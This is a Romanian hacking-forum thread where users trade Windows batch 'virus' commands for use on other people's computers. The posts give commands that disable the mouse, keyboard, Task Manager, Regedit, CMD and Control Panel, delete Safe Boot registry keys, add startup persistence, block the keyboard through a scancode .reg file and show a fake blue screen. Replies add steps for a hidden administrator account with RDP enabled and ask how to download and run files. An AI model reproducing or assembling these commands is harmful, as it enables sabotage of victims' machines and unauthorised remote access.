albertynos Posted May 16, 2014 Report Posted May 16, 2014 Salut,Nu e marea cu sarea...unii poate or sa gaseasca chestii interesante.Shutdown :shutdown -s -t 00 -c error > nulSchimbare butoane mouse :%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nulDezactivare mouse :rundll32 mouse,disable > nulDezactivare Tastatura:rundll32 keyboard,disable > nulDezactivare Monitor:rundll32 user,disableoemlayer > nulInchidere proces /Taskill:taskkill /f /im ProcessName.exe > nulMesaj :msg * MessageDeshidere pagina web:start www.rstforums.comElimina Control Panel:reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nulAdauga la deschidere (startup):copy %0 %windir%\AnyName.bat > nulreg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d %windir%\OriceNumeAici.bat /f"Program Lunch Denial" :reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nulDezactivare TaskManagerreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nulDezactivare Regedit:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nulDezactivare CMD :reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nulDezactivare Safe Boot :Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot\*.* /qReg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /qDezactivare Desktop :reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nulMai sunt destule, unele au facut ceva probleme pe windows 7, dar sunteti liberi sa va jucati...Spor Quote
iLuminat Posted May 19, 2014 Report Posted May 19, 2014 Banuiesc ca aceste scripturi se salveaza in notepad , la final cu . bat ? Quote
Viral-One Posted May 19, 2014 Report Posted May 19, 2014 Banuiesc ca aceste scripturi se salveaza in notepad , la final cu . bat ?Da, exemplu : shutdown.bat Quote
Renegade Posted May 19, 2014 Report Posted May 19, 2014 (edited) Da, exemplu : shutdown.batiar la Save as Type selectezi All Files Edited May 19, 2014 by Renegade Quote
sandabot Posted May 20, 2014 Report Posted May 20, 2014 Daca pot sa fac o cerere de un .bat care sa creeze un user nou ascuns cu o parola definita de mine iar acel user sa aiba remote acces activat ? Quote
Dark_4ngel Posted May 20, 2014 Report Posted May 20, 2014 (edited) pt a crea un user e net user /add [username] [password] si dupaia net localgroup administrators [username] /addsa fie ascuns gasesti aici Edited May 20, 2014 by Dark_4ngel Quote
iLuminat Posted May 20, 2014 Report Posted May 20, 2014 Mai stiti / aveti si altele , cu .bat ? Quote
albertynos Posted May 20, 2014 Author Report Posted May 20, 2014 Mai sunt destule o sa editez postul de sus curand cu mai multe... Quote
Viral-One Posted May 20, 2014 Report Posted May 20, 2014 (edited) Le-am gasit pe un stick, nu stiu cat mai sunt de functionale:Blocheaza Tastatura :echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00 ,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg" echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00 ,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e ,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00 ,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00 ,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00 ,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c ,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0 ,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"start "nokeyboard.reg"rem --Blue Screen of Death :@ echo offrem --rem Activate Blue Screen Of Death@((( Echo Off > Nul ) & Break Off ) @Echo offecho ^<html^>^<head^>^<title^>BSOD^</title^> > bsod.htaecho. >> bsod.htaecho ^<hta:application id="oBVC" >> bsod.htaecho applicationname="BSOD" >> bsod.htaecho version="1.0" >> bsod.htaecho maximizebutton="no" >> bsod.htaecho minimizebutton="no" >> bsod.htaecho sysmenu="no" >> bsod.htaecho Caption="no" >> bsod.htaecho windowstate="maximize"/^> >> bsod.htaecho. >> bsod.htaecho ^</head^>^<body bgcolor="#000088" scroll="no"^> >> bsod.htaecho ^<font face="Lucida Console" size="4" color="#FFFFFF"^> >> bsod.htaecho ^<p^>A problem has been detected and windows has been shutdown to prevent damage to your computer.^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>DRIVER_IRQL_NOT_LES_OR_EQUAL^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>If this is the first time you've seen this stop error screen, restart your computer, If this screen appears again, follow these steps:^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>Check to make sure any new hardware or software is properly installed. If this is a new installation, ask your hardware or software manufacturer for any windows updates you might need.^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>If problems continue, disable or remove any newly installed hardware or software. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>Technical information:^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>*** STOP: 0x000000D1 (0x0000000C,0x00000002,0x00000000,0xF86B5A89)^</p^> >> bsod.htaecho. >> bsod.htaecho. >> bsod.htaecho ^<p^>*** gv3.sys - Address F86B5A89 base at F86B5000, DateStamp 3dd9919eb^</p^> >> bsod.htaecho. >> bsod.htaecho ^<p^>Beginning dump of physical memory^</p^> >> bsod.htaecho ^<p^>Physical memory dump complete.^</p^> >> bsod.htaecho ^<p^>Contact your system administrator or technical support group for further assistance.^</p^> >> bsod.htaecho. >> bsod.htaecho. >> bsod.htaecho ^</font^> >> bsod.htaecho ^</body^>^</html^> >> bsod.htastart "" /wait "bsod.hta"del /s /f /q "bsod.hta" > nul Edited May 20, 2014 by Viral-One Quote
santo21 Posted May 20, 2014 Report Posted May 20, 2014 Mai sunt si aici: https://rstforums.com/forum/70829-cei-mai-buni-virusi-bat.rstCe e in plus acolo [sterge tot ce contine .exe din computer,Inchide deschide Cd-drive] Quote
iLuminat Posted May 22, 2014 Report Posted May 22, 2014 De exemplu la comanda shutdown -s -t 00 -c error > nul cum fac sa se repete de fiecare data cand se deschide pc-ul ? Quote
Googutul Posted March 9, 2015 Report Posted March 9, 2015 Daca pot sa fac o cerere de un .bat care sa creeze un user nou ascuns cu o parola definita de mine iar acel user sa aiba remote acces activat ?Activeaza RDP:reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /fFa un cont de administrator:net user administrator /active:yes Quote
Shinoo Posted March 9, 2015 Report Posted March 9, 2015 As putea sa combin cateva script-uri de aici sa si la salvez .bat? Quote
bilbo Posted March 12, 2015 Report Posted March 12, 2015 downloadare fisier de pe internet si executare nu este? Quote